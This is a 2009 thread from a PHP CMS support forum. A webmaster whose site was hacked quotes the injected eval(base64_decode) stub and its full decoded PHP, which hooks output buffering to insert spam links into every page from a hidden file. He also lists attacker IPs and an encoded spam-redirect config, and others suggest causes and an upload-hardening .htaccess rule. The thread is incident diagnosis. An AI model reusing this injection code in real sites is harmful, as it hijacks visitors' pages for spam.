Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues
Author Message
999
Regular
Regular



Joined: Sep 12, 2006
Posts: 58
Location: Dsm, IA

PostPosted: Thu Sep 03, 2009 6:47 pm Reply with quote

My site was just hacked with a large number of files containing
Code:
<?php /**/eval(base64_decode('aWYoZnV ... ')); ?>
at the top. I'll post the whole thing if needed, but decoded it come out to
Code:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Wondering if this is an exploit in the fckeditor or something else? I'm running RN2.30.02, and I make sure I patch everything on the site as it comes. I already contacted my host, just trying to figure out how they got in. Confused
 
View user's profile Send private message Visit poster's website MSN Messenger
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Sep 03, 2009 7:59 pm Reply with quote

Definitely start with your host and see whether you can get access logs to determine how they got in. It does look like FCKEditor could be an issue if its reading from that directory

Let us know if you need any help

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6407

PostPosted: Fri Sep 04, 2009 10:42 am Reply with quote

includes/fckeditor/editor/filemanager/browser/default/images/icons/32 shouldn't be writeable. If that php file is there, it's possible (if not likely) that there are security issues on the server (I've seen something like this happen before with an FTP security issue, and it affected every account on the server).

In the mean time, if you have access to your account logs, check that, but if it's a server issue, you won't find anything there...

_________________
I google, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
View user's profile Send private message
999







PostPosted: Fri Sep 04, 2009 1:08 pm Reply with quote

Unfortunately the logs had rolled over so they couldn't look at the actual attack, I have the raw log from yesterday but haven't seen anything in it yet (lot in there). That directory isn't world writeable, after running a cmd via ssh I only found a few directories that are (used by clan roster, gallery2, vsp stats, open realty, all up to date). I'm going to go through and make sure those actually need to be writeable but fckeditor wasn't one of them.

I had upgraded to fckeditor 2.6.4.1 which was the newest some time ago, but did find several files in there that shouldn't have been there. One had
Code:
78.36.167.197|1251994982

88.175.65.171|1251997114
95.17.34.164|1251999646
209.163.190.130|1252000351
78.155.51.255|1252003660
151.48.124.58|1252008367
66.92.130.158|1252009485
201.9.137.165|1252011765
89.24.130.142|1252016901
24.77.216.254|1252024403
122.102.128.77|1252025348
66.56.153.54|1252028808
72.201.85.107|1252036534
another
Code:
ZGdxbg== = "d3VvbQ=="

dHQ= = "Wz5VRl9LRVlXT1JEPF0="
ZGd1cmw= = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzE1JnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGdzdQ== = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzcmcGFyYW1ldGVyPSVrdyUmSFRUUF9SRUZFUkVSPSVzZWxmX3VybCU="
ZGd1aA== = "aHR0cDovL25vbXNhdDI0Lm5ldC87aHR0cDovL25zc2F0NC5jb20vO2h0dHA6Ly93cGxzYXQyNC5uZXQv"
ZGdpZA== = "YzcwM2Y2OTItMTcxZS0xNzI5LWQyMDUtYmMwZGQ2MjZlY2Qy"
a2Q= = Mg==
cHJs = MA==
c3A= = MzA=
c3Q= = "c3Ryb25nO2VtO2I7aTt1"
Y3Q= = MTAwMDAwMDAwMA==
bWFya292 = MA==
ZGdibG8= = MQ==
ZnJi = MQ==
bWw= = NTA=
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZGdmZA== = MA==
cXI= = "c2lkO3BocHNlc3NpZDtjYWtlcGhwO29zY3NpZDtwaHBraXRzaWQ7eGNpZDtzZXNzaW9uaWQ="
ZnI= = MA==
a3dy = MQ==
dGhlbWU= = ""
there was another that had tons of "spam related" words (blackjack, viagra, xanax, etc) and another was an swf binary. So at this point I'm guessing they were trying to add links to all the pages for spamming purposes, although I'm still not totally sure how they got in.

I've reverted fkceditor back to the version that came with 2.30.02, although it's a few versions behind so I don't know if that's a good idea. I did find that the owner had installed an old version of dolphin which has now been removed, but if they used that I don't understand why they would use the fckeditor directory as dolphin was on it's own in a subdirectory/for a subdomain.

Sorry for the long post. Do you think I should upgrade again to the newest fckeditor (2.6.4.1) or is the version with rn (2.63) the safer choice at this point?
 
evaders99







PostPosted: Fri Sep 04, 2009 6:41 pm Reply with quote

The upgrade for the latest FCKEditor probably hasn't been tested under RavenNuke. Yes, that could be the way they got in.

kguske is definitely the one to talk to, since he's integrating nukeWYSIWYG (FCKEditor) for RavenNuke
 
kguske







PostPosted: Fri Sep 04, 2009 9:34 pm Reply with quote

If you had FCKeditor 2.6.4.1, that works and is tested with RavenNuke (assuming it is configured correctly). It also contains some additional security features to prevent authorized uploads (if you used the version from nukeSEO or RN 2.3.2). But as I said earlier, this appears to have been done through another means. Even with 2.30, this shouldn't have been possible since even that version had features built in to prevent uploading executable files.
 
999







PostPosted: Fri Sep 04, 2009 10:46 pm Reply with quote

Yes I had the version from NukeSEO, and I've now upgraded back to it after removing all files. It's weird because I'm kinda wanting them to do it again, replacing the files isn't really an issue, I can just rsync back from known good files, I just really want to know how specifically they got in. Perhaps it was the dolphin install but that still bugs me why they'd use the fckeditor directory for all their files. Confused
 
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6795
Location: Ha Noi, Viet Nam

PostPosted: Sat Sep 05, 2009 3:57 pm Reply with quote

They probably used that directory to keep you focused on finding a problem with FCKeditor that doesn't exist.
 
View user's profile Send private message Send e-mail
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496

PostPosted: Sat Feb 13, 2010 12:01 pm Reply with quote

This is an old topic but worth a bump. An added measure of security is to limit the access (Assuming your on an apache web server) with .htaccess.

www/uploads/.htaccess
Code:


# Add Extensions as needed as shown
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png|avi)$">
 order deny,allow
 allow from all
</Files>


This will help to prevent double extension exploits such as php.jpg and will limit access to files with extensions in the array. IE images you want people to see! Maybe someone can improve on this but this is pretty universally excepted to work as it is.
 
View user's profile Send private message
spasticdonkey
RavenNuke(tm) Development Team



Joined: Dec 02, 2006
Posts: 1693
Location: Texas, USA

PostPosted: Sat Feb 13, 2010 12:17 pm Reply with quote

that's a pretty cool little snippet, thanks!
 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©